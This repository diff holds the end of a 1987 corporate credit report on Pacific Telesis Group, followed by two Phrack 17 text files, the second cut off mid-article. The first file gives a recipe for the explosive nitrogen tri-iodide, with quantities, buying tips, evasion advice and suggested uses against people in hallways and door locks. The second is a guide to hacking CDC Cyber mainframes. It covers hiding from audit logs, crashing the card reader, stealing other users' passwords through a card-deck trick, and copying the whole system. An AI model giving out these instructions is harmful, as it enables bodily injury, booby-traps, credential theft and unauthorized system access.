Total Liab to Net Worth (%) . 178.9 139.2 193.7 314.9
|
||||
Fix Assets to Net Worth (%) . 246.8 161.5 228.9 295.3
|
||||
|
||||
(EFFICIENCY)
|
||||
Coll Period (days). . . . . . 55.9 34.3 51.6 67.8
|
||||
Sales to Inventory. . . . . . ---- 52.1 32.6 20.1
|
||||
Assets to Sales (%) . . . . . 231.0 216.7 268.2 353.0
|
||||
Sales to Net Working Cap. . . ---- 7.2 3.1 1.7
|
||||
Acct Pay to Sales (%) . . . . 11.3 6.2 10.9 15.4
|
||||
|
||||
(PROFITABILITY)
|
||||
Return on Sales (%) . . . . . 10.6 18.5 13.1 9.8
|
||||
Return on Assets (%). . . . . 4.6 7.0 5.3 3.3
|
||||
|
||||
Return on Net Worth (%) . . . 12.8 19.7 15.7 12.6
|
||||
|
||||
Industry norms based on 504 firms,
|
||||
with assets over $5 million.
|
||||
|
||||
|
||||
END OF DOCUMENT
|
||||
|
||||
|
||||
|
||||
|
||||
Name & Address:
|
||||
PACIFIC TELESIS GROUP (INC)
|
||||
140 New Montgomery St
|
||||
SAN FRANCISCO, CA 94105
|
||||
|
||||
Telephone: 415-882-8000
|
||||
|
||||
DUNS Number: 10-346-0846
|
||||
|
||||
Line of Business: TELECOMMUNICATION SERVICES
|
||||
|
||||
Primary SIC Code: 4811
|
||||
Secondary SIC Codes: 2741 5063 5732 6159
|
||||
|
||||
Year Started: 1906 (12/31/86) COMBINATION FISCAL
|
||||
Employees Total: 74,937 Sales: 8,977,300,000
|
||||
Employees Here: 2,000 Net Worth: 7,753,300,000
|
||||
|
||||
This is a PUBLIC company
|
||||
|
||||
|
||||
|
||||
HISTORY
|
||||
09/01/87
|
||||
|
||||
DONALD E GUINN, CHB PRES+ THEODORE J SAENGER, V CHB GROUP
|
||||
PRES+
|
||||
SAM L GINN, V CHB+ JOHN E HULSE, V CHB CFO+
|
||||
ROBERT V R DALENBERG, EX V PRES BENTON W DIAL, EX V PRES-HUM
|
||||
GEN COUNSEL SEC RESOURCES
|
||||
ARTHUR C LATNO JR, EX V PRES THOMAS G CROSS, V PRES TREAS
|
||||
FRANK V SPILLER, V PRES
|
||||
COMPTROLLER
|
||||
DIRECTOR(S): The officers identified by (+) and Norman Barker Jr,
|
||||
William P Clark, Willaim K Coblentz, Myron Du Bain, Herman E Gallegos
|
||||
James R Harvey, Ivan J Houston, Leslie L Luttgens, E L Mc Neely, S
|
||||
Donley Ritchey, Willaim French Smith & Mary S Metz.
|
||||
Incorporated Nevada Oct 26 1983. Authorized capital consists of
|
||||
505,000,000 shares common stock, $.10 par value.
|
||||
OUTSTANDING CAPITAL STOCK: Consists of following at Dec 31 1986:
|
||||
215,274,878 common shares at a stated value of $21.5 million plus
|
||||
additional paid in capital of $5,068.5 million.
|
||||
The stock is publicly traded on the New York, Pacific and Midwest
|
||||
Stock Exchanges. There were 1,170,161 common shareholders at Feb 1 1987.
|
||||
Officers and directors as a group hold less than 1% of stock. No other
|
||||
entity owned more than 5% of the common stock outstanding.
|
||||
The authorized capital stock was increased to $1,100,000,000
|
||||
shares in 1987 by Charter Amendment. In addition, the company declared a
|
||||
two-for-one stock split in the form of a 100% stock dividend effective
|
||||
Mar 25 1987.
|
||||
BACKGROUND: This business was founded in 1906 as a California
|
||||
Corporation. The Pacific Telephone & Telegraph Company formed Dec 31
|
||||
1906. Majority of the stock was held by American Telephone & Telegraph
|
||||
Co (A T & T), New York, NY, prior to divestiture.
|
||||
DIVESTITURE: Pursuant to a court oder of the U S District Court for
|
||||
the Distirict of Columbia, A T & T divested itself of the exchange,
|
||||
telecommunications, exchange access and printing directory advertising
|
||||
portions of its 22 wholly-owned subsidiary operating telephone
|
||||
companies, including the Pacific Telephone & Telegraph Company. A T & T
|
||||
retains ownership of the former A T & T long lines interstate
|
||||
organization, as well as those portions of the subsidiaries that provide
|
||||
interchange services and customer premises equipment. To accomplish the
|
||||
divestiture, this regional holding company was formed, which took over
|
||||
the applicable operations and assets of the Pacific Telephone &
|
||||
Telegraph Company and its subsidiary, Bell Telephone Company of Nevada.
|
||||
Stock in the subject was distributed to the shareholders of A T & T, who
|
||||
also retained their existing A T & T Stock. The divestiture was
|
||||
accomplished on Jan 1 1984.
|
||||
RECENT EVENTS:During Jun 1986, the company completed the
|
||||
acquisition of Communications Industries Inc, Dallas, TX.
|
||||
In Dec 1986, the company's wholly-owned subsidiary Pac Tel Cellular
|
||||
Inc of Michigan signed an agreement to purhcase five cellular telephone
|
||||
properties for $316 million plus certain contingent payments. These five
|
||||
systems operate under the name of Cellular One. This acquaition is
|
||||
subject to regulatory and court approval and final legal review.
|
||||
------------------------OFFICERS------------------------.
|
||||
GUINN born 1932 married. 1954 received BSCE from Oregon State
|
||||
University. 1954-60 with The Pacific Telephone & Telegraph Company, San
|
||||
Francisco, CA. 1960-64 with Pacific Northwest Bell Telephone Co,
|
||||
Seattle, WA, as vice president. 1964-70 with A T & T. 1970-76 with
|
||||
Pacific Northwest Bell. 1976-80 with A T & T as vice president-network
|
||||
service. 1980 chairman and chief executive officer of The Pacific
|
||||
Telephone & Telegraph Company. 1984 with Pacific Telesis Group as
|
||||
chairman, president and chief executive officer.
|
||||
SAENGER born 1928 married. 1951 received BS from the University of
|
||||
California. 1946-47 in the U S Army. 1951-52 secretary and manager for
|
||||
the Oakland Junior Chamber of Commerce. 1950-70 held various positions
|
||||
with The Pacific Telephone & Telegraph Company. 1970-71 traffic
|
||||
operations director for Network Administration in New York, A T & T.
|
||||
1971 with The Pacific Telephone & Telegraph Company. 1974 vice
|
||||
president. 1977 president. 1984 with Pacific Telesis Group as vice
|
||||
chairman and president, Pacific Bell.
|
||||
GINN born 1937 married. 1959 graduated from Auburn University. 1969
|
||||
received MS from Stanford University. 1959-60 in the U S Army Signal
|
||||
Corps as captain. 1960 joined A T & T Long Lines. 1977 vice
|
||||
president-staff for A T & T Long Lines. 1978 joined The Pacific
|
||||
Telephone & Telegraph Company as executive vice president-network. 1983
|
||||
vice chairman. 1984 with Pacific Telesis Group as vice chairman and
|
||||
group president, PacTel Companies.
|
||||
HULSE born 1933 married. 1955 received BS from the University of
|
||||
South Dakota. 1956-58 in the U S Army. 1958 joined Northwestern Bell
|
||||
Telephone Co. 1980 joined The Pacific Telephone & Telegraph Company as
|
||||
executive vice president and chief financial officer. 1983 vice
|
||||
chairman. 1984 with Pacific Telesis Group as vice chairman and chief
|
||||
financial officer.
|
||||
LATNO born 1929 married. Received BS degree from the University of
|
||||
Santa Clara. 1952 with Pacific Telephone & Telegraph Co. 1972 vice
|
||||
president-regulatory. 1975 executive vice president-external affairs.
|
||||
1984 with Pacific Telesis Group as executive vice president-external
|
||||
affairs.
|
||||
DALENBERG born 1930 married. Graduated from the University of
|
||||
Chicago Law School and Graduate School of Business. 1956 admitted to
|
||||
practice at the Illinois Bar and in 1973 the California Bar. 1957-67
|
||||
private law practice in Chicago, IL. 1967-72 general attorney for
|
||||
Illinois Bell. 1972-75 general attorney for The Pacific Telephone &
|
||||
Telegraph Company. 1975 associate general counsel. 1976 vice president
|
||||
and secretary-general counsel. 1984 with Pacific Telesis Group as
|
||||
executive vice president and general counsel-secretary.
|
||||
CROSS. Vice President and Treasurer and also Vice President of
|
||||
Pacific Bell.
|
||||
DIAL born 1929 married. 1951 received BA from Whittier College.
|
||||
1961 received MS from California State University. 1951-53 in the U S
|
||||
Army. 1954 with The Pacific Telephone & Telegraph Company. 1973 vice
|
||||
president-regional staff and operations service for Southern California.
|
||||
1976 vice president-customer operations in Los Angeles, CA. 1977 vice
|
||||
president-corporate planning. 1980 vice president-human resources. 1984
|
||||
with Pacific Telesis Group as executive vice president-human resources.
|
||||
SPILLER born 1931 married. 1953 received BS from the University of
|
||||
California, San Francisco. 1954-56 in the U S Army as a second
|
||||
lieutenant. 1953 with The Pacific Telephone & Telegraph Company. 1977
|
||||
assistant comptroller. 1981 assistant vice president-finance management.
|
||||
1981 vice president and comptroller. 1984 with Pacific Telesis Group as
|
||||
vice president and comptroller.
|
||||
---------------------OTHER DIRECTORS---------------------.
|
||||
BARKER. Retired chairman of First Interstate Bank Ltd.
|
||||
CLARK. Of counsel to the law firm of Rogers & Wells.
|
||||
COBLENTZ. Senior Partner in Coblentz, Cahen, Mc Cabe & Breyer,
|
||||
Attorneys, San Francisco, CA.
|
||||
DU BAIN. Chairman of SRI International.
|
||||
GALLEGOS. Management consultant.
|
||||
HARVEY. Chairman, and chief executive officer of Transamerica
|
||||
Corporation, San Francisco, CA.
|
||||
HOUSTON. Chairman and chief executive officer of Golden State
|
||||
Mutual Life Insurance Co.
|
||||
LUTTGENS. Is a community leader.
|
||||
MC NEELY. Chairman and chief executive officer of Oak Industries,
|
||||
Inc, San Diego, CA.
|
||||
RITCHEY. Retired Chairman of Lucky Stores Inc.
|
||||
SMITH. Partner in Gibson, Dunn & Crutcher, Attorneys.
|
||||
METZ. President of Mills College.
|
||||
|
||||
OPERATION
|
||||
09/01/87
|
||||
|
||||
Pacific Telesis Group is a regional holding company whose
|
||||
operations are conducted by subsidiaries.
|
||||
The company's two major subsidiaries, Pacific Bell and Nevada Bell,
|
||||
provide a wide variety of communications services in California and
|
||||
Nevada, including local exchange and toll service, network access and
|
||||
directory advertising, and provided over 90% of total 1986 revenues.
|
||||
Other subsidiaries, as noted below, are engaged in directory
|
||||
publishing, cellular mobile communications and services, wholesaling of
|
||||
telecommunications products, integrated systems and other services,
|
||||
retails communications equipment and supplies, financing services for
|
||||
products of affiliated customers, real estate development, and
|
||||
consulting. Specific percentages of these operations are not available
|
||||
but in the aggregate represent approximately 10%.
|
||||
Terms are net 30 days. Has over 11,000,000 accounts. Sells to the
|
||||
general public and commercial concerns. Territory :Worldwide.
|
||||
EMPLOYEES: 74,937 including officers. 2,000 employed here.
|
||||
Employees are on a consolidated basis as of Dec 31 1986.
|
||||
FACILITIES: Owns over 500,000 sq. ft. in 20 story concrete and
|
||||
steel building in good condition. Premises neat.
|
||||
LOCATION: Central business section on side street.
|
||||
BRANCHES: The subject maintains minor additional administrative
|
||||
offices in San Francisco, CA, but most operating branches are conducted
|
||||
by the operating subsidiaries, primarily Pacific Bell and Nevada Bell in
|
||||
their respective states.
|
||||
SUBSIDIARIES: Subsidiaries: The Company has the following principal
|
||||
operating subsidiaries, all wholly-owned either directly or indirectly.
|
||||
The telephone subsidiaries account for over 90% of the operating
|
||||
results.
|
||||
(1) Pacific Bell (Inc) San Francisco CA. Formed 1906 as a
|
||||
California corporation. Acquired in 1984 as part of the divestiture of
|
||||
AT&T. It is the company's largest subsidiary . It provides
|
||||
telecommunicaton services within its service area in California.
|
||||
(2) Nevada Bell (Inc) Reno NV. Incorporated in 1913. acquired from
|
||||
Pacific Bell in 1984 by the divestiture of its stock. Provides
|
||||
telecommunications, services in Nevada.
|
||||
(3) Pac Tel Cellular Inc, TX. Renamed subsidiary formerly known
|
||||
as Comminications Industries Inc. Acquired in 1986. Operates as a
|
||||
marketer of cellular and paging services. This subsidiary, in turn, has
|
||||
several primary subsidiaries as follows:.
|
||||
(a) Gen Com Incorporated. Provides personal paging services.
|
||||
(b) Multicom Incorporated. Markets paging services.
|
||||
(4) Pac Tel Personal Communications. Formed to eventually hold all
|
||||
of the company's cellular and paging operations. It is the parent of the
|
||||
following:.
|
||||
(c) Pac Tel Cellular supports the company's cellular activities.
|
||||
(d) Pac Tel Mobile Services-formed to rent and sell cellular CPE
|
||||
and paging equipment and resell cellular services, is now largely
|
||||
inactive.
|
||||
(5) Pac Tel Corporation, San Francisco CA began operations in Jan
|
||||
1986 as a direct holding company subsidiary. It owns the stock of the
|
||||
following companies:.
|
||||
(e) Pac Tel Communications Companies-operates two primary
|
||||
divisions, Pac Tel Info Systems and Pac Tel Spectrum Services.
|
||||
(f) Pac Tel Finance-provides lease financing services.
|
||||
(g) Pac Tel Properties-engages in real estate transactions holding
|
||||
real estate valued at approximately $140 million at Dec 31 1986.
|
||||
(h) Pac Tel Publishing -inactive at present.
|
||||
(i) Pacific Telesis International-manages and operates
|
||||
telecommunicatin businesses in Great Britain, Japan, South Korea, Spain
|
||||
and Thailand.
|
||||
(6) Pac Tel Capital Resources, San Francisco, CA -provides funding
|
||||
through the sale of debt securities.
|
||||
INTERCOMPANY RELATIONS: Includes common management, intercompany
|
||||
services, inventory and equipment transactions, loans and advances. In
|
||||
addition, the debt of Pac Tel Capital Resources is backed by a support
|
||||
agreement from the parent with the debt unconditionally guaranteed for
|
||||
repayment without recourse to the stock or assets of the telephone
|
||||
subsidiaries or any interest therein.
|
||||
08-27(1Z2 /27) 29709 052678678 H
|
||||
ANALYST: Dan Quinn
|
||||
|
||||
12/31/86 COMBINATION FISCAL
|
||||
(Figures are in THOUSANDS)
|
||||
|
||||
FINANCIALS % COMPANY INDST
|
||||
COMPANY CHANGE % NORM %
|
||||
Total Current Assets. . . . . 2,156,300 9.3 10.6 22.0
|
||||
Fixed Assets. . . . . . . . . 17,244,900 1.6 84.9 35.6
|
||||
Other Non-current Assets. . . 919,300 53.8 4.5 42.4
|
||||
Total Assets. . . . . . . . . 20,320,500 4.0 100.0 100.0
|
||||
Total Current Liabilities . . 2,405,100 21.3 11.8 11.6
|
||||
Other Long Term Liab. . . . . 5,564,600 (7.6) 27.4 46.8
|
||||
Net Worth . . . . . . . . . . 7,753,300 6.0 38.2 35.2
|
||||
Total Liabilities & Worth. . 20,320,500 4.0 100.0 100.0
|
||||
Net Sales . . . . . . . . . . 8,977,300 5.6 100.0 100.0
|
||||
Gross Profit. . . . . . . . . ---- ---- ---- 40.1
|
||||
|
||||
|
||||
RATIOS % ---INDUSTRY QUARTILES---
|
||||
COMPANY CHANGE UPPER MEDIAN LOWER
|
||||
Quick Ratio . . . . . . . . . 0.7 ---- 2.9 1.2 0.6
|
||||
Current Ratio . . . . . . . . 0.9 (10.0) 4.9 2.2 1.0
|
||||
Total Liab to Net Worth (%) . 162.1 (2.9) 127.4 180.2 297.2
|
||||
Sales to Inventory. . . . . . 77.2 10.6 56.2 33.8 20.0
|
||||
Return on Sales (%) . . . . . 12.0 10.1 20.1 14.6 11.3
|
||||
Return on Assets (%). . . . . 5.3 10.4 7.2 5.7 3.7
|
||||
Return on Net Worth (%) . . . 13.9 9.4 19.0 15.9 12.8
|
||||
|
||||
Industry norms based on 469 firms,
|
||||
with assets over $5 million.
|
174
phrack17/4.txt
Normal file
174
phrack17/4.txt
Normal file
|
@ -0,0 +1,174 @@
|
|||
% = % = % = % = % = % = % = %
|
||||
= =
|
||||
% P h r a c k X V I I %
|
||||
= =
|
||||
% = % = % = % = % = % = % = %
|
||||
|
||||
Phrack Seventeen
|
||||
07 April 1988
|
||||
|
||||
File 4 of 12 : Nitrogen-Trioxide Explosives
|
||||
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
Working notes on Nitrogen Tri-Iodide (NI-3)
|
||||
|
||||
By: Signal Sustain
|
||||
|
||||
|
||||
|
||||
INTRODUCTION
|
||||
|
||||
This particular explosive is a real loser. It is incredibly unstable,
|
||||
dangerous to make, dangerous to work with, and you can't do much with it,
|
||||
either. A string of Black Cats is worth far more. At least you can blow up
|
||||
anthills with those.
|
||||
|
||||
NI-3 is basically a compound you can make easily by mixing up iodine crystals
|
||||
and ammonia. The resulting precipitate is very powerful and very unstable.
|
||||
It is semi stable when wet (nothing you want to trust) and absolutely unstable
|
||||
when dry. When dry, anything will set it off, such as vibration, wind, sun, a
|
||||
fly landing on it. It has to be one of the most unstable explosives you can
|
||||
deal with.
|
||||
|
||||
But it's easy to make. Anyone can walk into a chem supply house, and get a
|
||||
bottle of iodine, and and a supermarket, and get clear ammonia. Mix them and
|
||||
you're there. (See below for more on this)
|
||||
|
||||
So, some of you are going to try it, so I might as well pass on some tips from
|
||||
hard experience. (I learned it was a loser by trying it).
|
||||
|
||||
|
||||
Use Small Batches
|
||||
|
||||
|
||||
First, make one very small batch first. Once you learn how powerful this
|
||||
stuff is, you'll see why. If you're mixing iodine crystals (that's right,
|
||||
crystals, iodine is a metal, a halogen, and its solid form is crystals; the
|
||||
junk they sell as "iodine" in the grocery store is about 3% iodine in a bunch
|
||||
of solvents, and doesn't work for this application), you want maybe 1/4
|
||||
teaspoonful MAX, even less maybe. 1/4 TSP of this stuff is one hellacious
|
||||
bang; it rattled the windows for a block around when it went off in my back
|
||||
yard.
|
||||
|
||||
So go with 1/4 TSP, if I can talk you into it. The reason is the instability
|
||||
of this compound. If you mix up two teaspoonfuls and it goes off in your
|
||||
hand, kiss your hand goodbye right down to the wrist. A bucketful would
|
||||
probably level any house you'll find. But 1/4 teaspoon, you might keep your
|
||||
fingers. Since I know you're not going to mix this stuff up with remote
|
||||
tools, keep the quantities small. This stuff is so unstable it's best to
|
||||
hedge your bets.
|
||||
|
||||
Note: When holding NI3, try to hold with remote tools -- forceps? But if you
|
||||
have to pick it up, fold your thumb next to your first finger, and grip around
|
||||
with your fingers only. Do not grip the flask the conventional way, fingers
|
||||
on one side, thumb of the other. This way, if it goes, you may still have an
|
||||
opposing thumb, which is enough to get by with.
|
||||
|
||||
The compound is far more stable when wet, but not certain-stable. That's why
|
||||
companies that make explosives won't use it; even a small chance of it blowing
|
||||
up is too dangerous. (They still lose dynamite plants every now and then,
|
||||
too, which is why they're fully automated). But when this stuff gets dry,
|
||||
look out. Heinlein says "A harsh look will set it off", and he isn't kidding.
|
||||
Wind, vibration, a breath across it, anything will trigger it off. (By the
|
||||
way, Heinlein's process, from SF book "Farnham's Freehold", doesn't work,
|
||||
either -- you can't use iodine liquid for this. You must use iodine
|
||||
crystals.)
|
||||
|
||||
Don't Store It
|
||||
|
||||
What's so wickedly dangerous is if you try to store the stuff. Say you put it
|
||||
in a cup. After a day, a crust forms around the rim of the liquid, and it
|
||||
dries out. You pick up the cup, kabang!, the crust goes off, and the liquid
|
||||
goes up from the shock. Your fingers sail into your neighbor's lawn. If you
|
||||
make this, take extreme pains to keep it all wet. At least stopper the
|
||||
testtube, so it can't evaporate.
|
||||
|
||||
|
||||
Making It
|
||||
|
||||
Still want to make it? Okay. Get some iodine crystals at a chem supply
|
||||
store. If they ask, say you need to purify water for a camping trip, and
|
||||
they'll lecture you on better alternatives (halazone) but you can still get
|
||||
it. Or, tell them you've been elected to play Mr. Wizard, and be honest --
|
||||
you'll probably get it too. Possession is not illegal.
|
||||
|
||||
Get as little as possible. You need little and it's useless once you've tried
|
||||
it once. Aim for 1/4 teaspoonful.
|
||||
|
||||
Second, get some CLEAR, NON SUDSY ammonia at the store, like for cleaning
|
||||
purposes (BUT NO SUDS! They screw things up, it doesn't make the NI-3).
|
||||
|
||||
Third, pour ammonia in a bowl. Peeew! Nice smell.
|
||||
|
||||
Fourth, add 1/4 TSP or less of iodine crystals. Note these crystals, which
|
||||
looks like instant coffee, will attack other metals, so look out for your
|
||||
tableware. Use plastic everything (Bowl, spoon) if you can. These crystals
|
||||
will also leave long-standing iodine stains on hands, and that's damned
|
||||
incriminating if there was just an NI-3 explosion and they're looking for who
|
||||
did it. Rubber gloves, please, dispose after use.
|
||||
|
||||
Now the crystals will sort of spread out. Stir a little if need be. Be
|
||||
damned careful not to leave solution on the spoon that might dry. It'll go
|
||||
off if you do, believe me. (Experience).
|
||||
|
||||
Let them spread out and fizzz. They will. Then after an hour or so there
|
||||
will be left some reddish-brown glop in the bottom of the clear ammonia. It's
|
||||
sticky like mud, hard to handle.. That's the NI-3.
|
||||
|
||||
It is safe right now, as it is wet. (DO NOT LET A RIM FORM ON THE AMMONIA
|
||||
LIQUID!)
|
||||
|
||||
|
||||
|
||||
Using It
|
||||
|
||||
Now let's use up this junk right away and DON'T try to store it.
|
||||
|
||||
Go put it outside someplace safe. In my high school, someone once sprinkled
|
||||
tiny, tiny bits (like individual crystals) in a hallway. Works good, it's
|
||||
like setting off a cap under someone's shoe after the stuff dries. You need
|
||||
far less than 1/4 TSP for this, too.
|
||||
|
||||
Spread it out in the sun, let it dry. DO NOT DISTURB. If you hear a sudden
|
||||
CRACK!, why, it means the wind just blew enough to set it off, or maybe it
|
||||
just went off by itself. It does that too.
|
||||
|
||||
It must be thoroughly dry to reach max instability where a harsh look sets it
|
||||
off. Of course the top crystals dry first, so heads up. Any sharp impact
|
||||
will set it off, wet or dry.
|
||||
|
||||
While you're waiting for it to dry, go BURN the plastic cup and spoon you made
|
||||
it with. You'll hear small snapping noises as you do; this is the solution
|
||||
drying and going off in the flames.
|
||||
|
||||
After two hours or so, toss rocks at the NI3 from a long ways away, and you'll
|
||||
see it go off. Purplish fumes follow each explosion. It's a sharp CRACK, you
|
||||
can't miss it.
|
||||
|
||||
Anyway. Like I say, most people make this because the ingredients are so
|
||||
easily available. They make it, say what the hell do I do now?, and sprinkle
|
||||
tiny crystals in the hallway. Bang bang bang. And they never make it again,
|
||||
because you only get one set of fingers per hand, and most people want to keep
|
||||
them.
|
||||
|
||||
Or they put it in door locks (while still in the "sludge" form), and wait for
|
||||
it to try. Next person who sticks a key in there has a big surprise.
|
||||
|
||||
(This is also why most high school chem teachers lock up the iodine crystals.)
|
||||
|
||||
Getting Rid Of It
|
||||
|
||||
If you wash the NI-3 crystals down your kitchen sink, then you have to only
|
||||
wait for them to dry out and go off. They'll stick to the pipe (halogen
|
||||
property, there). I heard a set of pipes pop and crackle for days after this
|
||||
was done. I'd recommend going and throwing the mess into a vacant lots or
|
||||
something, and trying to set it off so no one else does accidentally.
|
||||
|
||||
If you do this, good luck, and you've been warned.
|
||||
|
||||
|
||||
-- Signal Sustain
|
||||
|
||||
|
||||
------------------------------------------------------------------------------
|
514
phrack17/5.txt
Normal file
514
phrack17/5.txt
Normal file
|
@ -0,0 +1,514 @@
|
|||
% = % = % = % = % = % = % = %
|
||||
= =
|
||||
% P h r a c k X V I I %
|
||||
= =
|
||||
% = % = % = % = % = % = % = %
|
||||
|
||||
Phrack Seventeen
|
||||
07 April 1988
|
||||
|
||||
File 5 of 12 : How to Hack Cyber Systems
|
||||
|
||||
|
||||
|
||||
How To Hack A CDC Cyber
|
||||
|
||||
By: ** Grey Sorcerer
|
||||
|
||||
|
||||
Index:
|
||||
|
||||
1. General Hacking Tips
|
||||
2. Fun with the card punch
|
||||
3. Getting a new user number the easy way
|
||||
4. Hacking with Telex and the CDC's batch design
|
||||
5. Grabbing a copy of the whole System
|
||||
6. Staying Rolled In with BREAK
|
||||
7. Macro Library
|
||||
8. RJE Status Checks
|
||||
9. The Worm
|
||||
10. The Checkpoint/Restart Method to a Better Validation
|
||||
|
||||
|
||||
I'm going to go ahead and skip all the stuff that's in your CDC reference
|
||||
manuals.. what's a local file and all that. If you're at the point of being
|
||||
ready to hack the system, you know all that; if not, you'll have to get up to
|
||||
speed on it before a lot of this will make sense. Seems to me too many "how
|
||||
to hack" files are just short rewrites of the user manuals (which you should
|
||||
get for any serious penetration attempt anyway, or you'll miss lots of
|
||||
possibilities), without any tips on ways to hack the system.
|
||||
|
||||
|
||||
General hacking tips:
|
||||
|
||||
|
||||
Don't get caught. Use remote dialups if possible and never never use any user
|
||||
number you could be associated with. Also never re-use a user number.
|
||||
Remember your typical Cyber site has a zillion user numbers, and they can't
|
||||
watch every one. Hide in numbers. And anytime things get "hot", lay off for
|
||||
awhile.
|
||||
|
||||
Magtapes are great. They hold about 60 Meg, a pile of data, and can hold even
|
||||
more with the new drives. You can hide a lot of stuff here offline, like
|
||||
dumps of the system, etc., to peruse. Buy a few top quality ones.. I like
|
||||
Black Watch tapes my site sells to me the most, and put some innocuous crap on
|
||||
the first few records.. data or a class program or whatever, then get to the
|
||||
good stuff. That way you'll pass a cursory check. Remember a usual site has
|
||||
THOUSANDS of tapes and cannot possibly be scanning every one; they haven't
|
||||
time.
|
||||
|
||||
One thing about the Cybers -- they keep this audit trail called a "port log"
|
||||
on all PPU and CPU accesses. Normally, it's not looked at. But just remember
|
||||
that *everything* you do is being recorded if someone has the brains and the
|
||||
determination (which ultimately is from you) to look for it. So don't do
|
||||
something stupid like doing real work on your user number, log off, log right
|
||||
onto another, and dump the system. They WILL know.
|
||||
|
||||
Leave No Tracks.
|
||||
|
||||
Also remember the first rule of bragging: Your Friends Turn You In.
|
||||
|
||||
And the second rule: If everyone learns the trick to increasing priority,
|
||||
you'll all be back on the same level again, won't you? And if you show just
|
||||
two friends, count on this: they'll both show two friends, who will show
|
||||
four...
|
||||
|
||||
So enjoy the joke yourself and keep it that way.
|
||||
|
||||
|
||||
Fun With The Card Punch
|
||||
|
||||
|
||||
Yes, incredibly, CDC sites still use punch cards. This is well in keeping
|
||||
with CDC's overall approach to life ("It's the 1960's").
|
||||
|
||||
The first thing to do is empty the card punch's punchbin of all the little
|
||||
punchlets, and throw them in someone's hair some rowdy night. I guarantee the
|
||||
little suckers will stay in their hair for six months, they are impossible to
|
||||
get out. Static or something makes them cling like lice. Showers don't even
|
||||
work.
|
||||
|
||||
The next thing to do is watch how your local installation handles punch card
|
||||
decks. Generally it works like this. The operators love punchcard jobs
|
||||
because they can give them ultra-low priority, and make the poor saps who use
|
||||
them wait while the ops run their poster-maker or Star Trek job at high
|
||||
priority. So usually you feed in your punchcard deck, go to the printout
|
||||
room, and a year later, out comes your printout.
|
||||
|
||||
Also, a lot of people generally get their decks fed in at once at the card
|
||||
reader.
|
||||
|
||||
If you can, punch a card that's completely spaghetti -- all holes punched.
|
||||
This has also been known to crash the cardreader PPU and down the system. Ha,
|
||||
ha. It is also almost certain to jam the reader. If you want to watch an
|
||||
operator on his back trying to pick pieces of card out of the reader with
|
||||
tweezers, here's your chance.
|
||||
|
||||
Next, the structure of a card deck job gives lots of possibilities for fun.
|
||||
Generally it looks like this:
|
||||
|
||||
JOB card: the job name (first 4 characters)
|
||||
User Card: Some user number and password -- varies with site
|
||||
EOR card: 7-8-9 are punched
|
||||
Your Batch job (typically, Compile This Fortran Program). You know, FTN.
|
||||
LGO. (means, run the Compiled Program)
|
||||
EOR card: 7-8-9 are punched
|
||||
The Fortran program source code
|
||||
EOR card: 7-8-9 are punched
|
||||
The Data for your Fortran program
|
||||
EOF card: 6-7-8-9 are punched. This indicates: (end of deck)
|
||||
|
||||
This is extremely typical for your beginning Fortran class.
|
||||
|
||||
In a usual mainframe site, the punchdecks accumulate in a bin at the operator
|
||||
desk. Then, whenever he gets to it, the card reader operator takes about
|
||||
fifty punchdecks, gathers them all together end to end, and runs them through.
|
||||
Then he puts them back in the bin and goes back to his Penthouse.
|
||||
|
||||
|
||||
GETTING A NEW USER NUMBER THE EASY WAY
|
||||
|
||||
|
||||
Try this for laughs: make your Batch job into:
|
||||
|
||||
JOB card: the job name (first 4 characters)
|
||||
User Card: Some user number and password -- varies with site
|
||||
EOR card: 7-8-9 are punched
|
||||
COPYEI INPUT,filename: This copies everything following the EOR mark to the
|
||||
filename in this account.
|
||||
EOR Card: 7-8-9 are punched.
|
||||
|
||||
Then DO NOT put an EOF card at the end of your job.
|
||||
|
||||
Big surprise for the job following yours: his entire punch deck, with, of
|
||||
course, his user number and password, will be copied to your account. This is
|
||||
because the last card in YOUR deck is the end-of-record, which indicates the
|
||||
program's data is coming next, and that's the next person's punch deck, all
|
||||
the way up to -his- EOF card. The COPYEI will make sure to skip those pesky
|
||||
record marks, too.
|
||||
|
||||
I think you can imagine the rest, it ain't hard.
|
||||
|
||||
|
||||
Hacking With Telex
|
||||
|
||||
When CDC added timeshare to the punch-card batch-job designed Cyber machines,
|
||||
they made two types of access to the system: Batch and Telex. Batch is a
|
||||
punch-card deck, typically, and is run whenever the operator feels like it.
|
||||
Inside the system, it is given ultra low priority and is squeezed in whenever.
|
||||
It's a "batch" of things to do, with a start and end.
|
||||
|
||||
Telex is another matter. It's the timeshare system, and supports up to, oh,
|
||||
60 terminals. Depends on the system; the more RAM, the more swapping area (if
|
||||
you're lucky enough to have that), the more terminals can be supported before
|
||||
the whole system becomes slug-like.
|
||||
|
||||
Telex is handled as a weird "batch" file where the system doesn't know how
|
||||
much it'll have to do, or where it'll end, but executes commands as you type
|
||||
them in. A real kludge.
|
||||
|
||||
Because the people running on a CRT expect some sort of response, they're
|
||||
given higher priority. This leads to "Telex thrashing" on heavily loaded CDC
|
||||
systems; only the Telex users get anywhere, and they sit and fight over the
|
||||
machine's resources.
|
||||
|
||||
The poor dorks with the punch card decks never get into the machine, because
|
||||
all the Telex users are getting the priority and the CPU. (So DON'T use punch
|
||||
cards.)
|
||||
|
||||
Another good tip: if you are REQUIRED to use punch cards, then go type in
|
||||
your program on a CRT, and drop it to the automatic punch. Sure saves trying
|
||||
to correct those typos on cards..
|
||||
|
||||
When you're running under Telex, you're part of one of several "jobs" inside
|
||||
the system. Generally there's "TELEX," something to run the line printer,
|
||||
something to run the card reader, the mag tape drivers (named "MAGNET") and
|
||||
maybe a few others floating around. There's limited space inside a Cyber..
|
||||
would you believe 128K 60-bit words?.. so there's a limited number of jobs
|
||||
that can fit. CDC put all their effort into "job scheduling" to make the best
|
||||
of what they had.
|
||||
|
||||
You can issue a status command to see all jobs running; it's educational.
|
||||
|
||||
Anyway, the CDC machines were originally designed to run card jobs with lots
|
||||
of magtape access. You know, like IRS stuff. So they never thought a job
|
||||
could "interrupt," like pressing BREAK on a CRT, because card jobs can't.
|
||||
This gives great possibilities.
|
||||
|
||||
Like:
|
||||
|
||||
Grabbing a Copy Of The System
|
||||
|
||||
For instance. Go into BATCH mode from Telex, and do a Fortran compile.
|
||||
While in that, press BREAK. You'll get a "Continue?" verification prompt.
|
||||
Say no, you'd like to stop.
|
||||
|
||||
Now go list your local files. Whups, there's a new BIG one there. In fact,
|
||||
it's a copy of the ENTIRE system you're running on -- PPU code, CPU code, ALL
|
||||
compilers, the whole shebang! Go examine this local file; you'll see the
|
||||
whole bloody works there, mate, ready to play with.
|
||||
|
||||
